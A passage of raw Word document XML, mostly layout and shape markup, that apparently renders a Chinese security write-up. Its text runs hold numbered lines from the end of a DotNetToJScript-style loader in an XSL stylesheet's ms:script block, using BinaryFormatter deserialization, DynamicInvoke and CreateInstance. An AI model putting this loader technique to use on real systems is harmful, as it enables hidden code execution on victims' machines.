        <v:shape style="position:absolute;left:2290;top:11870;width:130;height:270" coordorigin="2290,11870" coordsize="130,270" path="m2305,11895l2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2305,11895,2306,11895,2306,11895,2306,11895,2306,11895,2306,11895,2306,11895,2306,11895,2306,11895,2306,11895,2306,11895,2307,11895,2307,11895,2307,11895,2307,11895,2307,11895,2307,11895,2308,11895,2308,11895,2308,11895,2308,11895,2309,11895,2309,11895,2309,11895,2310,11895,2310,11895,2310,11895,2311,11895,2311,11895,2312,11895,2312,11895,2313,11895,2313,11895,2314,11895,2314,11895,2315,11895,2315,11895,2316,11895,2316,11895,2317,11895,2318,11895,2318,11895,2319,11895,2320,11895,2321,11895,2321,11895,2322,11895,2323,11895,2324,11895,2325,11895,2326,11895,2327,11895,2328,11895,2329,11895,2330,11895,2331,11895,2332,11895,2333,11895,2334,11895,2335,11895,2336,11895,2338,11895,2339,11895,2340,11895,2342,11895,2343,11895,2344,11895,2346,11895,2347,11895,2349,11895,2350,11895,2352,11895,2354,11895,2355,11895,2357,11895,2359,11895,2361,11895,2362,11895,2364,11895,2366,11895,2368,11895,2370,11895,2372,11895,2374,11895,2376,11895,2379,11895,2381,11895,2383,11895,2385,11895,2388,11895,2390,11895,2392,11895,2395,11895,2397,11895,2400,11895,2403,11895,2405,11895,2408,11895,2411,11895,2414,11895,2416,11895,2419,11895,2422,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11895,2425,11896,2425,11896,2425,11896,2425,11896,2425,11896,2425,11896,2425,11897,2425,11897,2425,11897,2425,11897,2425,11898,2425,11898,2425,11898,2425,11899,2425,11899,2425,11899,2425,11900,2425,11900,2425,11901,2425,11901,2425,11902,2425,11903,2425,11903,2425,11904,2425,11905,2425,11905,2425,11906,2425,11907,2425,11908,2425,11909,2425,11910,2425,11911,2425,11912,2425,11913,2425,11914,2425,11915,2425,11916,2425,11918,2425,11919,2425,11920,2425,11922,2425,11923,2425,11925,2425,11926,2425,11928,2425,11929,2425,11931,2425,11933,2425,11935,2425,11937,2425,11939,2425,11941,2425,11943,2425,11945,2425,11947,2425,11949,2425,11951,2425,11954,2425,11956,2425,11959,2425,11961,2425,11964,2425,11967,2425,11970,2425,11973,2425,11975,2425,11978,2425,11982,2425,11985,2425,11988,2425,11991,2425,11995,2425,11998,2425,12002,2425,12005,2425,12009,2425,12013,2425,12017,2425,12021,2425,12025,2425,12029,2425,12033,2425,12037,2425,12042,2425,12046,2425,12051,2425,12056,2425,12060,2425,12065,2425,12070,2425,12075,2425,12080,2425,12086,2425,12091,2425,12096,2425,12102,2425,12108,2425,12113,2425,12119,2425,12125,2425,12131,2425,12137,2425,12144,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2425,12150,2424,12150,2424,12150,2424,12150,2424,12150,2424,12150,2424,12150,2424,12150,2423,12150,2423,12150,2423,12150,2423,12150,2423,12150,2422,12150,2422,12150,2422,12150,2422,12150,2421,12150,2421,12150,2421,12150,2420,12150,2420,12150,2420,12150,2419,12150,2419,12150,2418,12150,2418,12150,2417,12150,2417,12150,2416,12150,2416,12150,2415,12150,2415,12150,2414,12150,2413,12150,2413,12150,2412,12150,2411,12150,2411,12150,2410,12150,2409,12150,2408,12150,2407,12150,2407,12150,2406,12150,2405,12150,2404,12150,2403,12150,2402,12150,2401,12150,2400,12150,2399,12150,2398,12150,2396,12150,2395,12150,2394,12150,2393,12150,2391,12150,2390,12150,2389,12150,2387,12150,2386,12150,2384,12150,2383,12150,2381,12150,2380,12150,2378,12150,2377,12150,2375,12150,2373,12150,2372,12150,2370,12150,2368,12150,2366,12150,2364,12150,2362,12150,2360,12150,2358,12150,2356,12150,2354,12150,2352,12150,2350,12150,2347,12150,2345,12150,2343,12150,2340,12150,2338,12150,2335,12150,2333,12150,2330,12150,2328,12150,2325,12150,2322,12150,2320,12150,2317,12150,2314,12150,2311,12150,2308,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12150,2305,12149,2305,12149,2305,12149,2305,12149,2305,12149,2305,12149,2305,12149,2305,12148,2305,12148,2305,12148,2305,12147,2305,12147,2305,12147,2305,12146,2305,12146,2305,12146,2305,12145,2305,12145,2305,12144,2305,12144,2305,12143,2305,12142,2305,12142,2305,12141,2305,12140,2305,12140,2305,12139,2305,12138,2305,12137,2305,12136,2305,12135,2305,12134,2305,12133,2305,12132,2305,12131,2305,12130,2305,12129,2305,12128,2305,12126,2305,12125,2305,12124,2305,12122,2305,12121,2305,12119,2305,12117,2305,12116,2305,12114,2305,12112,2305,12110,2305,12109,2305,12107,2305,12105,2305,12103,2305,12100,2305,12098,2305,12096,2305,12094,2305,12091,2305,12089,2305,12086,2305,12084,2305,12081,2305,12078,2305,12075,2305,12073,2305,12070,2305,12067,2305,12064,2305,12060,2305,12057,2305,12054,2305,12050,2305,12047,2305,12043,2305,12040,2305,12036,2305,12032,2305,12028,2305,12024,2305,12020,2305,12016,2305,12012,2305,12008,2305,12003,2305,11999,2305,11994,2305,11989,2305,11985,2305,11980,2305,11975,2305,11970,2305,11965,2305,11959,2305,11954,2305,11949,2305,11943,2305,11937,2305,11932,2305,11926,2305,11920,2305,11914,2305,11908,2305,11901,2305,11895e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:593.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,11870" coordsize="130,270">
        <v:shape style="position:absolute;left:2530;top:11870;width:130;height:270" coordorigin="2530,11870" coordsize="130,270" path="m2545,11895l2545,11895,2545,11895,2545,11895,2545,11895,2545,11895,2545,11895,2545,11895,2545,11895,2545,11895,2545,11895,2545,11895,2545,11895,2545,11895,2545,11895,2545,11895,2546,11895,2546,11895,2546,11895,2546,11895,2546,11895,2546,11895,2546,11895,2546,11895,2546,11895,2546,11895,2546,11895,2547,11895,2547,11895,2547,11895,2547,11895,2547,11895,2547,11895,2548,11895,2548,11895,2548,11895,2548,11895,2549,11895,2549,11895,2549,11895,2550,11895,2550,11895,2550,11895,2551,11895,2551,11895,2551,11895,2552,11895,2552,11895,2553,11895,2553,11895,2554,11895,2554,11895,2555,11895,2555,11895,2556,11895,2556,11895,2557,11895,2558,11895,2558,11895,2559,11895,2560,11895,2561,11895,2561,11895,2562,11895,2563,11895,2564,11895,2565,11895,2566,11895,2567,11895,2568,11895,2569,11895,2570,11895,2571,11895,2572,11895,2573,11895,2574,11895,2575,11895,2577,11895,2578,11895,2579,11895,2580,11895,2582,11895,2583,11895,2585,11895,2586,11895,2588,11895,2589,11895,2591,11895,2592,11895,2594,11895,2596,11895,2597,11895,2599,11895,2601,11895,2603,11895,2604,11895,2606,11895,2608,11895,2610,11895,2612,11895,2614,11895,2617,11895,2619,11895,2621,11895,2623,11895,2625,11895,2628,11895,2630,11895,2633,11895,2635,11895,2638,11895,2640,11895,2643,11895,2645,11895,2648,11895,2651,11895,2654,11895,2656,11895,2659,11895,2662,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11896,2665,11896,2665,11896,2665,11896,2665,11896,2665,11896,2665,11897,2665,11897,2665,11897,2665,11897,2665,11898,2665,11898,2665,11898,2665,11899,2665,11899,2665,11899,2665,11900,2665,11900,2665,11901,2665,11901,2665,11902,2665,11903,2665,11903,2665,11904,2665,11905,2665,11905,2665,11906,2665,11907,2665,11908,2665,11909,2665,11910,2665,11911,2665,11912,2665,11913,2665,11914,2665,11915,2665,11916,2665,11918,2665,11919,2665,11920,2665,11922,2665,11923,2665,11925,2665,11926,2665,11928,2665,11929,2665,11931,2665,11933,2665,11935,2665,11937,2665,11939,2665,11941,2665,11943,2665,11945,2665,11947,2665,11949,2665,11951,2665,11954,2665,11956,2665,11959,2665,11961,2665,11964,2665,11967,2665,11970,2665,11973,2665,11975,2665,11978,2665,11982,2665,11985,2665,11988,2665,11991,2665,11995,2665,11998,2665,12002,2665,12005,2665,12009,2665,12013,2665,12017,2665,12021,2665,12025,2665,12029,2665,12033,2665,12037,2665,12042,2665,12046,2665,12051,2665,12056,2665,12060,2665,12065,2665,12070,2665,12075,2665,12080,2665,12086,2665,12091,2665,12096,2665,12102,2665,12108,2665,12113,2665,12119,2665,12125,2665,12131,2665,12137,2665,12144,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2664,12150,2664,12150,2664,12150,2664,12150,2664,12150,2664,12150,2664,12150,2663,12150,2663,12150,2663,12150,2663,12150,2663,12150,2662,12150,2662,12150,2662,12150,2661,12150,2661,12150,2661,12150,2660,12150,2660,12150,2660,12150,2659,12150,2659,12150,2658,12150,2658,12150,2657,12150,2657,12150,2656,12150,2656,12150,2655,12150,2655,12150,2654,12150,2653,12150,2653,12150,2652,12150,2651,12150,2651,12150,2650,12150,2649,12150,2648,12150,2648,12150,2647,12150,2646,12150,2645,12150,2644,12150,2643,12150,2642,12150,2641,12150,2640,12150,2639,12150,2638,12150,2636,12150,2635,12150,2634,12150,2633,12150,2632,12150,2630,12150,2629,12150,2627,12150,2626,12150,2625,12150,2623,12150,2622,12150,2620,12150,2618,12150,2617,12150,2615,12150,2613,12150,2612,12150,2610,12150,2608,12150,2606,12150,2604,12150,2602,12150,2600,12150,2598,12150,2596,12150,2594,12150,2592,12150,2590,12150,2587,12150,2585,12150,2583,12150,2580,12150,2578,12150,2576,12150,2573,12150,2571,12150,2568,12150,2565,12150,2563,12150,2560,12150,2557,12150,2554,12150,2551,12150,2548,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12150,2545,12149,2545,12149,2545,12149,2545,12149,2545,12149,2545,12149,2545,12149,2545,12148,2545,12148,2545,12148,2545,12147,2545,12147,2545,12147,2545,12146,2545,12146,2545,12146,2545,12145,2545,12145,2545,12144,2545,12144,2545,12143,2545,12142,2545,12142,2545,12141,2545,12140,2545,12140,2545,12139,2545,12138,2545,12137,2545,12136,2545,12135,2545,12134,2545,12133,2545,12132,2545,12131,2545,12130,2545,12129,2545,12128,2545,12126,2545,12125,2545,12124,2545,12122,2545,12121,2545,12119,2545,12117,2545,12116,2545,12114,2545,12112,2545,12110,2545,12109,2545,12107,2545,12105,2545,12103,2545,12100,2545,12098,2545,12096,2545,12094,2545,12091,2545,12089,2545,12086,2545,12084,2545,12081,2545,12078,2545,12075,2545,12073,2545,12070,2545,12067,2545,12064,2545,12060,2545,12057,2545,12054,2545,12050,2545,12047,2545,12043,2545,12040,2545,12036,2545,12032,2545,12028,2545,12024,2545,12020,2545,12016,2545,12012,2545,12008,2545,12003,2545,11999,2545,11994,2545,11989,2545,11985,2545,11980,2545,11975,2545,11970,2545,11965,2545,11959,2545,11954,2545,11949,2545,11943,2545,11937,2545,11932,2545,11926,2545,11920,2545,11914,2545,11908,2545,11901,2545,11895e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:593.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,11870" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:11870;width:130;height:270" coordorigin="2650,11870" coordsize="130,270" path="m2665,11895l2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2665,11895,2666,11895,2666,11895,2666,11895,2666,11895,2666,11895,2666,11895,2666,11895,2666,11895,2666,11895,2666,11895,2666,11895,2666,11895,2667,11895,2667,11895,2667,11895,2667,11895,2667,11895,2667,11895,2668,11895,2668,11895,2668,11895,2668,11895,2669,11895,2669,11895,2669,11895,2670,11895,2670,11895,2670,11895,2671,11895,2671,11895,2671,11895,2672,11895,2672,11895,2673,11895,2673,11895,2674,11895,2674,11895,2675,11895,2675,11895,2676,11895,2677,11895,2677,11895,2678,11895,2679,11895,2679,11895,2680,11895,2681,11895,2682,11895,2682,11895,2683,11895,2684,11895,2685,11895,2686,11895,2687,11895,2688,11895,2689,11895,2690,11895,2691,11895,2692,11895,2693,11895,2694,11895,2695,11895,2697,11895,2698,11895,2699,11895,2700,11895,2702,11895,2703,11895,2705,11895,2706,11895,2708,11895,2709,11895,2711,11895,2712,11895,2714,11895,2716,11895,2717,11895,2719,11895,2721,11895,2723,11895,2725,11895,2726,11895,2728,11895,2730,11895,2732,11895,2734,11895,2737,11895,2739,11895,2741,11895,2743,11895,2745,11895,2748,11895,2750,11895,2753,11895,2755,11895,2758,11895,2760,11895,2763,11895,2765,11895,2768,11895,2771,11895,2774,11895,2777,11895,2779,11895,2782,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11895,2785,11896,2785,11896,2785,11896,2785,11896,2785,11896,2785,11896,2785,11897,2785,11897,2785,11897,2785,11897,2785,11898,2785,11898,2785,11898,2785,11899,2785,11899,2785,11899,2785,11900,2785,11900,2785,11901,2785,11901,2785,11902,2785,11903,2785,11903,2785,11904,2785,11905,2785,11905,2785,11906,2785,11907,2785,11908,2785,11909,2785,11910,2785,11911,2785,11912,2785,11913,2785,11914,2785,11915,2785,11916,2785,11918,2785,11919,2785,11920,2785,11922,2785,11923,2785,11925,2785,11926,2785,11928,2785,11929,2785,11931,2785,11933,2785,11935,2785,11937,2785,11939,2785,11941,2785,11943,2785,11945,2785,11947,2785,11949,2785,11951,2785,11954,2785,11956,2785,11959,2785,11961,2785,11964,2785,11967,2785,11970,2785,11973,2785,11975,2785,11978,2785,11982,2785,11985,2785,11988,2785,11991,2785,11995,2785,11998,2785,12002,2785,12005,2785,12009,2785,12013,2785,12017,2785,12021,2785,12025,2785,12029,2785,12033,2785,12037,2785,12042,2785,12046,2785,12051,2785,12056,2785,12060,2785,12065,2785,12070,2785,12075,2785,12080,2785,12086,2785,12091,2785,12096,2785,12102,2785,12108,2785,12113,2785,12119,2785,12125,2785,12131,2785,12137,2785,12144,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2785,12150,2784,12150,2784,12150,2784,12150,2784,12150,2784,12150,2784,12150,2783,12150,2783,12150,2783,12150,2783,12150,2783,12150,2782,12150,2782,12150,2782,12150,2781,12150,2781,12150,2781,12150,2780,12150,2780,12150,2780,12150,2779,12150,2779,12150,2778,12150,2778,12150,2778,12150,2777,12150,2776,12150,2776,12150,2775,12150,2775,12150,2774,12150,2774,12150,2773,12150,2772,12150,2772,12150,2771,12150,2770,12150,2769,12150,2768,12150,2768,12150,2767,12150,2766,12150,2765,12150,2764,12150,2763,12150,2762,12150,2761,12150,2760,12150,2759,12150,2758,12150,2757,12150,2755,12150,2754,12150,2753,12150,2752,12150,2750,12150,2749,12150,2748,12150,2746,12150,2745,12150,2743,12150,2742,12150,2740,12150,2738,12150,2737,12150,2735,12150,2733,12150,2732,12150,2730,12150,2728,12150,2726,12150,2724,12150,2722,12150,2720,12150,2718,12150,2716,12150,2714,12150,2712,12150,2710,12150,2708,12150,2705,12150,2703,12150,2701,12150,2698,12150,2696,12150,2693,12150,2691,12150,2688,12150,2685,12150,2683,12150,2680,12150,2677,12150,2674,12150,2671,12150,2668,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12150,2665,12149,2665,12149,2665,12149,2665,12149,2665,12149,2665,12149,2665,12149,2665,12148,2665,12148,2665,12148,2665,12147,2665,12147,2665,12147,2665,12146,2665,12146,2665,12146,2665,12145,2665,12145,2665,12144,2665,12144,2665,12143,2665,12142,2665,12142,2665,12141,2665,12140,2665,12140,2665,12139,2665,12138,2665,12137,2665,12136,2665,12135,2665,12134,2665,12133,2665,12132,2665,12131,2665,12130,2665,12129,2665,12128,2665,12126,2665,12125,2665,12124,2665,12122,2665,12121,2665,12119,2665,12117,2665,12116,2665,12114,2665,12112,2665,12110,2665,12109,2665,12107,2665,12105,2665,12103,2665,12100,2665,12098,2665,12096,2665,12094,2665,12091,2665,12089,2665,12086,2665,12084,2665,12081,2665,12078,2665,12075,2665,12073,2665,12070,2665,12067,2665,12064,2665,12060,2665,12057,2665,12054,2665,12050,2665,12047,2665,12043,2665,12040,2665,12036,2665,12032,2665,12028,2665,12024,2665,12020,2665,12016,2665,12012,2665,12008,2665,12003,2665,11999,2665,11994,2665,11989,2665,11985,2665,11980,2665,11975,2665,11970,2665,11965,2665,11959,2665,11954,2665,11949,2665,11943,2665,11937,2665,11932,2665,11926,2665,11920,2665,11914,2665,11908,2665,11901,2665,11895e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:192.500pt;margin-top:593.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3850,11870" coordsize="130,270">
        <v:shape style="position:absolute;left:3850;top:11870;width:130;height:270" coordorigin="3850,11870" coordsize="130,270" path="m3866,11895l3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3866,11895,3867,11895,3867,11895,3867,11895,3867,11895,3867,11895,3867,11895,3867,11895,3867,11895,3868,11895,3868,11895,3868,11895,3868,11895,3868,11895,3869,11895,3869,11895,3869,11895,3869,11895,3870,11895,3870,11895,3870,11895,3871,11895,3871,11895,3871,11895,3872,11895,3872,11895,3872,11895,3873,11895,3873,11895,3874,11895,3874,11895,3875,11895,3875,11895,3876,11895,3877,11895,3877,11895,3878,11895,3878,11895,3879,11895,3880,11895,3881,11895,3881,11895,3882,11895,3883,11895,3884,11895,3885,11895,3886,11895,3886,11895,3887,11895,3888,11895,3889,11895,3890,11895,3891,11895,3893,11895,3894,11895,3895,11895,3896,11895,3897,11895,3898,11895,3900,11895,3901,11895,3902,11895,3904,11895,3905,11895,3907,11895,3908,11895,3910,11895,3911,11895,3913,11895,3914,11895,3916,11895,3918,11895,3920,11895,3921,11895,3923,11895,3925,11895,3927,11895,3929,11895,3931,11895,3933,11895,3935,11895,3937,11895,3939,11895,3942,11895,3944,11895,3946,11895,3948,11895,3951,11895,3953,11895,3956,11895,3958,11895,3961,11895,3963,11895,3966,11895,3969,11895,3972,11895,3974,11895,3977,11895,3980,11895,3983,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11895,3986,11896,3986,11896,3986,11896,3986,11896,3986,11896,3986,11896,3986,11897,3986,11897,3986,11897,3986,11897,3986,11898,3986,11898,3986,11898,3986,11899,3986,11899,3986,11899,3986,11900,3986,11900,3986,11901,3986,11901,3986,11902,3986,11903,3986,11903,3986,11904,3986,11905,3986,11905,3986,11906,3986,11907,3986,11908,3986,11909,3986,11910,3986,11911,3986,11912,3986,11913,3986,11914,3986,11915,3986,11916,3986,11918,3986,11919,3986,11920,3986,11922,3986,11923,3986,11925,3986,11926,3986,11928,3986,11929,3986,11931,3986,11933,3986,11935,3986,11937,3986,11939,3986,11941,3986,11943,3986,11945,3986,11947,3986,11949,3986,11951,3986,11954,3986,11956,3986,11959,3986,11961,3986,11964,3986,11967,3986,11970,3986,11973,3986,11975,3986,11978,3986,11982,3986,11985,3986,11988,3986,11991,3986,11995,3986,11998,3986,12002,3986,12005,3986,12009,3986,12013,3986,12017,3986,12021,3986,12025,3986,12029,3986,12033,3986,12037,3986,12042,3986,12046,3986,12051,3986,12056,3986,12060,3986,12065,3986,12070,3986,12075,3986,12080,3986,12086,3986,12091,3986,12096,3986,12102,3986,12108,3986,12113,3986,12119,3986,12125,3986,12131,3986,12137,3986,12144,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3986,12150,3985,12150,3985,12150,3985,12150,3985,12150,3985,12150,3985,12150,3985,12150,3985,12150,3984,12150,3984,12150,3984,12150,3984,12150,3984,12150,3983,12150,3983,12150,3983,12150,3983,12150,3982,12150,3982,12150,3982,12150,3981,12150,3981,12150,3981,12150,3980,12150,3980,12150,3980,12150,3979,12150,3979,12150,3978,12150,3978,12150,3977,12150,3977,12150,3976,12150,3975,12150,3975,12150,3974,12150,3973,12150,3973,12150,3972,12150,3971,12150,3971,12150,3970,12150,3969,12150,3968,12150,3967,12150,3966,12150,3966,12150,3965,12150,3964,12150,3963,12150,3962,12150,3961,12150,3959,12150,3958,12150,3957,12150,3956,12150,3955,12150,3953,12150,3952,12150,3951,12150,3950,12150,3948,12150,3947,12150,3945,12150,3944,12150,3942,12150,3941,12150,3939,12150,3937,12150,3936,12150,3934,12150,3932,12150,3931,12150,3929,12150,3927,12150,3925,12150,3923,12150,3921,12150,3919,12150,3917,12150,3915,12150,3913,12150,3910,12150,3908,12150,3906,12150,3904,12150,3901,12150,3899,12150,3896,12150,3894,12150,3891,12150,3889,12150,3886,12150,3883,12150,3880,12150,3878,12150,3875,12150,3872,12150,3869,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12150,3866,12149,3866,12149,3866,12149,3866,12149,3866,12149,3866,12149,3866,12149,3866,12148,3866,12148,3866,12148,3866,12147,3866,12147,3866,12147,3866,12146,3866,12146,3866,12146,3866,12145,3866,12145,3866,12144,3866,12144,3866,12143,3866,12142,3866,12142,3866,12141,3866,12140,3866,12140,3866,12139,3866,12138,3866,12137,3866,12136,3866,12135,3866,12134,3866,12133,3866,12132,3866,12131,3866,12130,3866,12129,3866,12128,3866,12126,3866,12125,3866,12124,3866,12122,3866,12121,3866,12119,3866,12117,3866,12116,3866,12114,3866,12112,3866,12110,3866,12109,3866,12107,3866,12105,3866,12103,3866,12100,3866,12098,3866,12096,3866,12094,3866,12091,3866,12089,3866,12086,3866,12084,3866,12081,3866,12078,3866,12075,3866,12073,3866,12070,3866,12067,3866,12064,3866,12060,3866,12057,3866,12054,3866,12050,3866,12047,3866,12043,3866,12040,3866,12036,3866,12032,3866,12028,3866,12024,3866,12020,3866,12016,3866,12012,3866,12008,3866,12003,3866,11999,3866,11994,3866,11989,3866,11985,3866,11980,3866,11975,3866,11970,3866,11965,3866,11959,3866,11954,3866,11949,3866,11943,3866,11937,3866,11932,3866,11926,3866,11920,3866,11914,3866,11908,3866,11901,3866,11895e x" fillcolor="#fefefe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35" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1489" w:firstLine="-15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143</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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fmt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7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'System.Runtime.Serialization.Formatter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s.Binary.BinaryFormatter'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144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al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'System.Collections.ArrayList'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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145</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549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d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fmt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Deserialize_2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>stm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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146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Add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(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undefined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31" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="1609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147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4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DynamicInvoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="11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al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ToArray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(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CreateInstance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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entry_class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148</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28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149</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="11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catch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)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404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{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150</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>  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debug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(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e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5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message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="10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14" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9533" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>151</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}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152</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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153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8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ms:script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154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stylesheet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35" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
